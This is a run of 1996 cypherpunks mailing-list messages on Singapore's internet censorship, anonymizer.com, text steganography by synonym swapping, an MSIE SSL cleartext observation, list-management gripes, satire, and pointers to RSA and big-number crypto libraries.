increase in wages unmatched by productivity increases.  The latter is 
unlikely to be caused extensively by government policy or spending 
(Davis-Bacon is an obvious exception to this in the private sector), and if 
the government spending and taxes are zero then obviously the former can't 
be the cause.  


> But we were happier.

That reminds me of a related flaw in Sim City.  When the program is queried as to
what the public's main complaints are, the information is presented by the program as 
the percentage of the population considering various problems to be the 
"most important."  However, it did not explicitly rank the SERIOUSNESS of 
these problems in absolute terms.  Since it is practically an axiom of human 
nature that we'll FIND something to complain about if nothing comes 
immediately to mind, the danger is that you'll over-react to a non-problem 
with a "solution" (often involving more government spending) that is even 
worse.

Another bias was the fact that the program seemed to lump all 
infrastructure-type spending into government, as opposed to a privatized 
solution.   In reality, if you drop government spending very low problems 
will begin to be solved by private means.  In Sim City, however, the system 
did not compensate in this way,  leading to low or even negative growth, and 
extreme dissatisfaction, etc.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 30 Aug 1996 09:25:29 +0800
To: cypherpunks@toad.com
Subject: www.anonymizer.com
Message-ID: <199608292255.PAA08976@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


www.anonymizer.com got a nice plug in David Plotnikoff's column in today's
San Jose Mercury News.  He quotes Community ConneXion's motto, "Because on
today's Internet, people do know you're a dog."  He also mentions its
similarity to anonymous remailers.  His capsule review:

"On the upside, it's very easy to use and it supports gopher and FTP
transfers as well as Web pages.  On the downside, it's predictable slow and
pages, bracketed top and bottom with Anonymizer banners, often don't
display quite right."


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius libri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 30 Aug 1996 10:26:20 +0800
To: cypherpunks@toad.com
Subject: Re: Singapore Global Action Alert (8/29/96)
Message-ID: <199608292303.QAA09504@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  5:21 PM 8/29/96 -0500, Jean-Francois Avon wrote:
>I am fed up of seing net users giving every would-be dictator the
>benefit of the doubt.  There is no tolerance to be applied to that. 
>There is no such thing as being tolerent to poison.

I don't think this is giving Singapore's rulers the benefit of the doubt. 
Rather, it is a case of asking politely the first time.  Since it is asking
him to change a policy of his, it is merely avoiding calling him a shithead
in the process.  When you want someone to do something voluntarily, it is
usually better to start by being polite.

It is up to other net-forces to make sure that censorship is ineffective
for technical reasons.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius libri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien Lucifer <root@HellSpawn>
Date: Fri, 30 Aug 1996 07:50:21 +0800
To: cypherpunks@toad.com
Subject: RE: Mimic Function Stego Programs?
Message-ID: <Pine.LNX.3.91.960829163251.6291B-100000@HellSpawn>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Thu, 29 Aug 1996 16:32:40 -0400 (EDT)
Subject: RE: Mimic Function Stego Programs?

On Thu, 29 Aug 1996, * wrote:

> better than the 64 word ones I've used. I'd like to get a hold of these 
> (or the program, if it's not texto). I mailed DJ about it, but he said 
> he picked it up from a newsgroup he couldn't remember. If you follow up 
> please let me know any results. Fascinating stuff ...


Donno, the next hop from 64 words per type is 4096 words per type, a very 
tall order.

I've been working on a text steg'ing program for a while that operates 
under a different premise, however. It keeps a dictionary of word pairs, 
with each word in the pair being a synonym for the other.  It will read 
through a donor file, swapping words based on whether we need to hide a 1 
or a 0.  The encoder is working right now but the decoder is not.
 
A quick example:

dictionary: 1=sofa 0=couch
input: The couch is very comfortable
output (0): The sofa is very comfortable.
output (1): The couch is very comfortable.

The output text is virtually identical to the input text, and would (in 
most cases) easily fool the average human reader, as well as fooling 
simple mail filters. 

The main problem is that very little can be hidden in a text file in this 
manner.  I have one peice of text that is 50k, and can conceal about 64 
characters of data.  More typical numbers are around 15-25 characters/50k, 
which is why I never finished the decoder. Once i started encoding things, 
and realizing how little could be hidden in this manner, I stopped working 
on it. 

At the moment the dictionary is very small; nearly all of the words are 
relevant to only pornographic text (since porno is both predictable, and 
repetitive, i thought it would be a good place to start). :) 

I have the source code around, if you care to take a look at it.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 30 Aug 1996 10:36:01 +0800
To: cypherpunks@toad.com
Subject: RE: Desubscribe
In-Reply-To: <9607298413.AA841352799@smtplink.alis.ca>
Message-ID: <XDXFTD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jbugden@smtplink.alis.ca writes:
> When I send an e-mail, the header contains two equivalent addresses:
> jbugden@smtplink.alis.ca and jbugden@alis.com.
> 
> Unfortunately, there is some logic in majordomo that is not symmetric so th=
> at
> while I can subscribe as jbugden@alis.com, I can not unsubscribe since majo=
> rdomo
> notices jbugden@smtplink.alis.ca in the header and treats the attempt to
> unsubscribe as a forgery.
If you don't have the brains to forge the From:, then you have no business
being subscribed to any mailing list.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 30 Aug 1996 08:08:20 +0800
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: Singapore Global Action Alert (8/29/96)
Message-ID: <9608292122.AA25332@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: Cypherpunks@toad.com
29/08/96
Subject: Re: Singapore Global Action Alert (8/29/96)

On 29 Aug 96 at 11:31, Declan McCullagh forwarded:

> The application (...in Singapore) of broadcast-inspired,
> "one-to-many"
regulation to
> this new *many-to-many* medium (...the internet) indicates a
> fundamental misunderstanding of the nature of the Internet.

I completely disagree here!

Taking into account the philosophico-political context there, it
*obviously* indicate a *complete* understanding of the nature of the
net.  It is you (the writer of the forwarded article) who did not
either dare to state or simply recognize the true nature of a govt
pushing such measures. 

I am fed up of seing net users giving every would-be dictator the
benefit of the doubt.  There is no tolerance to be applied to that. 
There is no such thing as being tolerent to poison.

Why don't we start naming things by their true names?

JFA
- -- 
Jean-Francois Avon
DePompadour, Societe d'Importation Ltee
    Limoges porcelain, silverware and crystal
JFA Technologies
    R&D consultants: physicists technologists and engineers.
Montreal, QC, Canada
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAgUBMiWnB8iycyXFit0NAQGvaAf9HHTGYk/MAg/uX3uP87sOd6mWrVLw8J8u
4XFp83YV1MPBkqZ5xIxmxBNR6bF2RyqFIiD/go3x3nbfX5YkdF9jXW4iOnYNK6Ji
DzrlWTDNGFwTnbUnUbPraSjULU/0x3YdKAVmcxqr6KYBBLR2NVEtiqzbVQK2exHU
DZUG6oamV4sK5QFRA5gj0L+oB+qEdveZJrTK13rZT3UC21GXuOBGRPpHQStfU5nK
3v7ajP4IdlxxHZutL/S1LmPJw1iSf9eDtn76J7Y8UxrgknNavavs9rxte3mUjns1
TneE7zz2g9VMS6cqGttncp/Cwc7AkeURi7nu0tnr7jCvwlo4GhGSoA==
=4R7n
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Fri, 30 Aug 1996 11:53:51 +0800
To: cypherpunks@toad.com
Subject: RE: Desubscribe
Message-ID: <199608300026.RAA08325@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain




> On Or About: 29 Aug 96, 16:57, Dr.Dimitri Vulis KOTM wrote:
> 
> > jbugden@smtplink.alis.ca writes:
> 
> > > can not unsubscribe since majo= rdomo notices
> > > jbugden@smtplink.alis.ca in the header and treats the attempt to
> > > unsubscribe as a forgery.
> >
> > If you don't have the brains to forge the From:, then you have no
> > business being subscribed to any mailing list.
> > 
> 

 What's worse?  Losers who can't unsubscribe from a mailing list they
 subscribed to OR spammers?   ;-)
 
 Ross
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 30 Aug 1996 12:07:19 +0800
To: cypherpunks@toad.com
Subject: Nuke Singapore Back into the Stone Age
Message-ID: <ae4b87a502021004a21e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:21 PM 8/29/96, Jean-Francois Avon wrote:

>I completely disagree here!
>
>Taking into account the philosophico-political context there, it
>*obviously* indicate a *complete* understanding of the nature of the
>net.  It is you (the writer of the forwarded article) who did not
>either dare to state or simply recognize the true nature of a govt
>pushing such measures.
>
>I am fed up of seing net users giving every would-be dictator the
>benefit of the doubt.  There is no tolerance to be applied to that.
>There is no such thing as being tolerent to poison.
>
>Why don't we start naming things by their true names?

I agree with Jean-Francois--most of the recent announcements by governments
about the Internet actually indicate *full awareness* of what their actions
could mean for the propagation of articles, the extradition of
Net.criminals, and the development of a Global New World Computer Order.

The United States knew what the CDA would mean, the government of Bavaria
knew what the crackdown on "racist" Web sites and newsgroups would mean,
the government of Singapore understands full well what their actions could
mean, and so on.

And it is likely that the "control" advocates in each of these countries
(and others) are pleased when one of their brother countries announces new
crackdowns on the Net and Web. Very few governments actually like free
speech in all of its forms, and certainly the U.S. government does not.
Sure, there is lip service paid to "free speech" in the U.S., but the list
of illegal things to say keeps getting longer (just last week Clinton
illegalized many forms of speech involving cigarettes--what part of
"Congress shall make no law" is not being understood here?).

As to why so many of the criticisms of such crackdowns use "weasel
language," such as the example Jean-Francois disagrees with, well, this is
the way the game is played. The alternative to "The government of Singapore
fails to understand the nature of the Net and could do grievous harm to it"
is not quite so diplomatic:

"Fucking statists. Time to nuke 'em back to the stone age."

Personally, if this crackdown in Singapore happens, I intend to post
various anti-Singapore and anti-Lee Kwan Yew & Sons screeds to various
newsgroups that Singaporans might like to read. Then, if the Yew Dynasty
decides to pull the plug, it'll be to more and more groups.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <charley@clark.net>
Date: Fri, 30 Aug 1996 08:25:48 +0800
To: cypherpunks@toad.com
Subject: New Microsoft Product! ! ! (fwd)
Message-ID: <Pine.GSO.3.95.960829175805.25199D-100000@clark.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Thu, 29 Aug 1996 11:11:00 -0400
From: ICSHAB@aol.com
Subject: New Microsoft Product! ! !

Microsoft Panhandler v1.0 (Beta)
 
 Redmond, WA -- Microsoft Corporation chair, CEO and all-around babe magnet
Bill Gates announced yesterday the introduction of a new product for Windows
95: Microsoft Panhandling.
 
 "The idea came to me the other day when a homeless man asked me for
money,"recalls Gates. "I suddenly realized that we were missing a golden
opportunity.  Here was a chance to make a profit without any initial monetary
investment. Naturally, this man then became my competition, so I had my limo
driver run over him several times."
 
 Microsoft engineers have been working around the clock to complete Gates'
vision of panhandling for the 21st century.
 
"We feel that our program designers really understand how the poor and needy
situation works," says Microsoft Homeless product leader Bernard Liu. "Except
for the fact that they're stinking rich."
 
 Microsoft Panhandling will be automatically installed with Windows 95. At
random intervals, a dialog box pops up, asking the user if they could spare
any change so that Microsoft has enough money to get a hot meal. ("This is a
little lie," admits software engineer Adam Miller, "since our diet consists
of Coke and Twinkies, but what panhandler doesn't embellish a little?") The
user can click Yes, in which case a random amount of change between $.05 and
$142.50 is transferred from the user's bank account to Microsoft's. The user
can also respond No, in which case the program politely tells the user to
have a nice day. The "No" button has not yet been implemented.
 
 "We're experiencing a little trouble programming the No button," Bernard Liu
says, "but we should definitely have it up and running within the next couple
of years. Or at least by the time Windows 2014 comes out. Maybe."
 
 Gates says this is just the start of an entire line of products. 
 "Be on the lookout for products like Microsoft Mugging, which either takes
$50 or erases your hard drive, and Microsoft Squegee Guy, which will clean up
your Windows for a dollar." (When Microsoft Squegee Guy ships, Windows 95
will no longer automatically refresh your windows.)  But there are
competitors on the horizon. Sun Microsystems and Oracle Corporation are
introducing panhandling products of their own.

 "Gates is a few tacos short of a combination platter, if you get my drift,"
says Oracle Head Honcho and 3rd degree black belt Larry Ellison. "I mean, in
the future, we won't need laptop computers asking you for change. You'll have
an entire network of machines asking you for money."
 
Gates responded with, "I know what you are, but what am I?"  General
pandemonium then ensued.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 30 Aug 1996 12:32:53 +0800
To: "David E. Smith" <cypherpunks@toad.com
Subject: Re: Clinton follies ideas?
Message-ID: <199608300141.SAA08320@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 PM 8/28/96 -0500, David E. Smith wrote:

>Our esteemed figurehead, Bill Clinton, will be doing
>the first stop of his "Road to Victory Tour" campaign
>this Friday, just a few blocks from my apartment.  Does
>anybody have any cool suggestions on things to do to
>harass, heckle, or maybe get taken down by the Secret
>Service?  (Or should I just yell, 'Clinton, you suck!'? :)

It's too bad that somebody can't fiddle with his speech tonight, at the end 
of a page inserting the text,

"I'm really sorry that my friend and advisor Dick Morris was caught..."
    
and then replacing the rest of the speech with blank pages...

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 30 Aug 1996 09:25:44 +0800
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: DoJ is poking around
In-Reply-To: <199608290802.DAA09847@mailhub.amaranth.com>
Message-ID: <Pine.SV4.3.91.960829185336.23148B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> >I have a military account. Not all govt or military accounts belong to 
> >black-helicopter pilots.

> Wern't ya the one who buzzed my trailer park while I was talking to Elvis the other night? :)


     I actually live in a single-wide. Heaven's acre, as it were.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 30 Aug 1996 09:21:00 +0800
To: cypherpunks@toad.com
Subject: The few, the proud, the under-quota'd-mailbox US Marine Corps
Message-ID: <Pine.SV4.3.91.960829185728.23148D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Thu, 29 Aug 96 3:46:15 -24000
From: MAILER-DAEMON@mqg-smtp3.usmc.mil
To: alanh@infi.net
Subject: Undeliverable Message

To:            "Skeeve Stevens" <skeeve@skeeve.net>
Cc:            <cypherpunks@toad.com>
Subject:       Re: DoJ is poking around

Message not delivered to recipients below.  Press F1 for help with VNM
error codes.               

	VNM3043:  BANYAN SERVER@MAG26@2DMAW NEW RIVER


VNM3043 -- MAILBOX IS FULL

   The message cannot be delivered because the
   recipient's mailbox contains the maximum number of 
   messages, as set by the system administrator.  The
   recipient must delete some messages before any
   other messages can be delivered.
    The maximum message limit for a user's mailbox is 
   10,000.  The default message limit is 1000 messages.  
   Administrators can set message limits using the 
   Mailbox  Settings function available in the 
   Manage User menu  (MUSER). 

   When a user's mailbox reaches the limit, the 
   user must delete some of the messages before 
   the mailbox can accept any more incoming messages.

UNDEFINEDI have a military account. Not all govt or military accounts belong to 
black-helicopter pilots.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Pecic <74740.670@CompuServe.COM>
Date: Fri, 30 Aug 1996 12:25:45 +0800
To: Unknow User <cypherpunks@toad.com>
Subject: Mail to sbinkley@atitech.ca
Message-ID: <960829230902_74740.670_EHB101-2@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


You are continualy sending to Scott Binkley (sbinkley@atitech.ca). Scott is no
longer at ATI so please stop sending to this invalid address.
Brian Pecic
bpecic@atitech.ca





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 30 Aug 1996 10:11:14 +0800
To: Robb Hill <robbhill@southwestpaper.com>
Subject: Re: see you guys later
In-Reply-To: <v01540b02ae4b77865fbf@[206.66.171.67]>
Message-ID: <Pine.SV4.3.91.960829191132.23148L-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


<< See you guys later >>


Oh my God, I've been rejected by a beltway bandit.

Tim M, could you hand me a double dose of my Lithium this time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 30 Aug 1996 15:03:40 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Singapore Global Action Alert (8/29/96)
In-Reply-To: <199608292303.QAA09504@netcom7.netcom.com>
Message-ID: <Pine.SUN.3.91.960829190641.678B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Bill speaks sooth. Personally, I agree with Jean-Francois in that the
Singapore government *does* understand the Net, and is using that
knowledge to control it within their borders reasonably well. Remember the
next phase of restrictions goes into effect on September 15. 

But I don't see a problem in being polite the first time. 

-Declan



On Thu, 29 Aug 1996, Bill Frantz wrote:

> At  5:21 PM 8/29/96 -0500, Jean-Francois Avon wrote:
> >I am fed up of seing net users giving every would-be dictator the
> >benefit of the doubt.  There is no tolerance to be applied to that. 
> >There is no such thing as being tolerent to poison.
> 
> I don't think this is giving Singapore's rulers the benefit of the doubt. 
> Rather, it is a case of asking politely the first time.  Since it is asking
> him to change a policy of his, it is merely avoiding calling him a shithead
> in the process.  When you want someone to do something voluntarily, it is
> usually better to start by being polite.
> 
> It is up to other net-forces to make sure that censorship is ineffective
> for technical reasons.
> 
> 
> -------------------------------------------------------------------------
> Bill Frantz       | Cave ab homine unius libri | Periwinkle -- Consulting
> (408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
> frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA
> 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 30 Aug 1996 12:33:39 +0800
To: cypherpunks@toad.com
Subject: Re: A _REALLY_ Interesting Bet [2]
In-Reply-To: <199608291709.LAA07068@zifi.genetics.utah.edu>
Message-ID: <Pine.LNX.3.93.960829193441.177B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 29 Aug 1996, Anonymous wrote:
> the unwanted phonecalls around suppertime, as I said before. The media
> would eventually flock to the more-accurate poll, even if it involved
> the dreaded crass freemarket capitalism of people willingly gambling.

     This presumes a media that desires an accurate poll. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Hemming - CEO MarketNet"  <johnhemming@mkn.co.uk>
Date: Fri, 30 Aug 1996 07:10:50 +0800
To: cypherpunks@toad.com
Subject: Re: MSIE cryptography
Message-ID: <1996-Aug29-194210.1>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray writes:

>Peter Trei writes:
>> 
>> John Hemming - CEO MarketNet"  <johnhemming@mkn.co.uk> writes:
> 
>> > Just downloaded the most recent English Version 2.1 for Windows 3.1.
>> > This does appear to do the same in terms of no encryption at all after
>> > the server hello.
>> Please ensure that the server you are connecting to is not configured for
>> authenticate-only. It would be a pity to raise a big ruckus over what may be
>> just a mis-configured server.

>In addition, encryption isn't performed until after the ClientFinished
>and ServerFinished messages, no matter which CipherSuites are negotiated.

Actually the server verify message should be encrypted (to verify the
key negotiation).  Also the server and client finished should be encrypted.
I don't actually get the client finished record or client master key record.

However, I don't get those all I get is the cleartext data in packets of
SSL record format.   I have done a little more experimentation and it does
appear quite clear that this happens with a non standard (ie not
Verisign and a few others) X509 Certificate.

In the trace that I have posted it is clear that cypher 02 00 80 has
in theory been negotiated.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Thu, 29 Aug 1996 22:25:44 +0800
To: stewarts@ix.netcom.com
Subject: Re: Mimic Function Stego Programs?
In-Reply-To: <199608282111.RAA17052@cbig1.att.att.com>
Message-ID: <Pine.LNX.3.91.960829194606.14794L-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


If sociobabble (as opposed to manager babble) can do, try with the Dada 
Engine shown at 
 http://www.cs.monash.edu.au/cgi-bin/postmodern
and replace the PRNG with cyphertext. The kleptocrats will probably 
invite the sender to hold a seminar :-)

Enzo

On Wed, 28 Aug 1996 stewarts@ix.netcom.com wrote:

> Does anybody have a stego program along the lines of Peter Wayner's
> Mimic Functions?  I'm looking for something that you can hand a grammar
> and a set of bits that will produce sentences in the grammar,
> plus a decoder that can take the sentences and reconstruct the bits.
> I have a friend who lives in a kleptocratic country where the local
> bureaucrats have made it clear they'll confiscate the main email node
> in his town if they catch traffic they recognize as encrypted,
> and text in some non-popular language may be less obvious than, say,
> Mandelbrot sets with stego-bits or other artwork.
> 
> 
> -----
> PHB would work ok...
> http://www.unitedmedia.com/comics/dilbert/archive/dilbert960821-9577.gif
> -----
> 
> 
> #			Thanks;  Bill
> # Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
> # <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bf578@scn.org (SCN User)
Date: Fri, 30 Aug 1996 15:42:23 +0800
To: cypherpunks@toad.com
Subject: Re: www.anonymizer.com
Message-ID: <199608300319.UAA00645@scn.org>
MIME-Version: 1.0
Content-Type: text/plain


>
>www.anonymizer.com got a nice plug in David Plotnikoff's column in today's
>San Jose Mercury News.  He quotes Community ConneXion's motto, "Because on
>today's Internet, people do know you're a dog."  He also mentions its
>similarity to anonymous remailers.  His capsule review:
>
>"On the upside, it's very easy to use and it supports gopher and FTP
>transfers as well as Web pages.  On the downside, it's predictable slow and
>pages, bracketed top and bottom with Anonymizer banners, often don't
>display quite right."

 mailto: links take you to a anonymous remailer web page that lets
          you choose among remailers.
 news: can be read anonymously but posting doesn't seem to work yet.
 If converts all links in a page to use the service.

 Some info does get through , such as your broswer type.
 Soon, i guess browsers programmers will start passing info there!

 Don't know what happens with shttp:? anybody tried?

 Slowness is probably because the "service" is free and they don't
  have the funds for more horsepower.

 They do claim that they cache documents, so if one person gets
  a page from a slow server then everyone else can get it faster.
  (of course they'd have to be faster!)


--
------------------------------------------
There are no facts, only interpretations.

I always wanted to be somebody, 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 30 Aug 1996 13:54:55 +0800
To: cypherpunks@toad.com
Subject: Errors-To: for cypherpunks
Message-ID: <199608300121.UAA31369@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Hi,

Whoever is in charge of maintaining this mailnig list, PLEASE
add header 

Errors-To: cypherpunks-errors@toad.com

I am flooded by stupid "Mailbox is full" messages from Banyan and 
CC-mail gateways.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 30 Aug 1996 14:11:56 +0800
To: "William H. Geiger III" <cypherpunks@toad.com
Subject: Re: Intel to rule the basic crypto engine market?
Message-ID: <199608300330.UAA14539@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:56 AM 8/24/96 -0500, William H. Geiger III wrote:

>Intresting but..., In the era of ITAR, GAK, Key Escrows,Clipper,& FileGate 
>do we really want to put all our eggs in one basket? And that basket being 
>based on hardware? IMHO I don't see Intell standing up to the government any 
>more than Netscape, Mircosoft, IBM, or Lotus has. I have serious doubts that 
>our "beloved" goverment will alow any standard to be adopted that does not 
>allow them access whenever they please. I personally do not run any security 
>code on my machines that I do not have the
>source for & have instpected.


The one kind of standardization in the crypto market that we truly need, 
NOW, is a standard format/protocol so that crypto telephones from all 
manufacturers can talk to each other.  The last thing we need is a 
tower-of-Babel situation, which would be even worse than the VHS/Beta wars 
of 20-10 years ago.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 30 Aug 1996 15:51:08 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: The few, the proud, the under-quota'd-mailbox US Marine Corps
In-Reply-To: <Pine.SV4.3.91.960829185728.23148D-100000@larry.infi.net>
Message-ID: <Pine.LNX.3.93.960829203002.305A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 29 Aug 1996, Alan Horowitz wrote:
> ---------- Forwarded message ----------
> 	VNM3043:  BANYAN SERVER@MAG26@2DMAW NEW RIVER
                                      ^^^^^^^^^^^^^^^
     See this part? 
               
> 
> UNDEFINEDI have a military account. Not all govt or military accounts belong to 
> black-helicopter pilots.

     Stands for 2nd Marine Air Wing, MCAS New River, N.C. 

     New River is a helicopter base. I served their as a crispy critter for 
three and a half years. 

     He just might pilot a black helicopter. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 30 Aug 1996 14:39:51 +0800
To: cypherpunks@toad.com
Subject: Win95 HD encryption?
Message-ID: <Pine.3.89.9608292135.A15229-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


My main machine is in the shop and with it are the recently posted 
instructions how to do file system encryption under Win95.

Somebody please email them to me.

TIA,

--Lucky






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <vagab0nd@sd.cybernex.net>
Date: Fri, 30 Aug 1996 16:58:46 +0800
To: cypherpunks@toad.com
Subject: Re: Elliptic Curve Y**2 = x**3 + a * x**2 + b
Message-ID: <2.2.32.19960830023856.0075c734@mail.sd.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


> 1: How can I take the suqare root mod p ?

This has what to do with CP?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Fri, 30 Aug 1996 15:21:19 +0800
To: cypherpunks@toad.com
Subject: Exploring (RSA (001)
Message-ID: <960829223938_397314410@emout12.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Exploring Rivest, Shamir, Adelman algorithm, but hoping someone out there is
interested in very large number manipulations.

RSA suggests choosing two prime 100 digit numbers p and q for beginning of
key generation.

These numbers are obviously beyond the long type of a C program.

Other than using Mathematica or Maple, I would like to use C or perferrably
C++.

Just some basics such as multiplication, addition, subtraction, division,
mod, etc over the Z set.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 30 Aug 1996 19:40:27 +0800
To: cypherpunks@toad.com
Subject: Re: Exploring (RSA (001)
Message-ID: <199608300605.XAA20594@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:39 PM 8/29/96 -0400, Scottauge@aol.com wrote:
>Exploring Rivest, Shamir, Adelman algorithm, but hoping someone out there is
>interested in very large number manipulations.
>
>...
>
>Other than using Mathematica or Maple, I would like to use C or perferrably
>C++.
>
>Just some basics such as multiplication, addition, subtraction, division,
>mod, etc over the Z set.

I have been collecting information about crypto libraries for the Mac
Crypto conference next week.  Here is what a quick AltaVista search came up
with.  Since you want C++, I would particularly look at Wei Dai's Crypto++
library.  If anyone has other strongly recommended libraries, please let me
know.


Crypto Libraries
 
  http://www.clark.net/pub/cme/ has source for MD5
 
  http://www.homeport.org/~adam/crypto/ for a comparison of crypto
  libraries
 
  http://www.enter.net/~chronos/cryptolog1.html has a collection of
  links to crypto resources
 
  http://www.openmarket.com/techinfo/applied.htm - Internet Locations 
  for Materials on the Disks for Applied Cryptography
 
  Crypto++ in C++ by Wei Dai. -  Has been tested under Codewarrior
  2.0. 
 
    ftp://ftp.csn.net/mpj/README  - in the USA
 
  Cryptolib in C by Jack Lacy - No Mac version, C, Sparc, SGI, i486
  assembler  
 
    To obtain, send email to cryptolib@research.att.com with a
    statement of the following 
    form:  
     
           "I am a U.S. or Canadian citizen or a legal permanent
    resident of the 
            U.S. and am aware that some parts of CryptoLib may be
    restricted under 
            United States Export regulations.  I have read and
    understand the 
            CryptoLib license." 
     
     
            Name: 
            Location: 
            E-mail: 
            Are you licensed to use the RSA patent? 
               If yes, give name of licensed organization: 
 
  RSAref 2.0, by RSA Data Security Inc. - Tested with Mac
 
    ftp://ftp.rsa.com:/rsaref/README  - In the USA
 
    http://www.consensus.com/RSAREF/rsaref_toc.html - in the USA
 
  SSLeay in C by Eric Young - C, gcc and system cc for Solaris 2.[34] 
  (sparc and x86), SunOS 4.1.3, DGUX, OSF1 Alpha, HPUX 9, AIX 3.5,
  IRIX 5.[23], LINUX, NeXT (intel) 
 
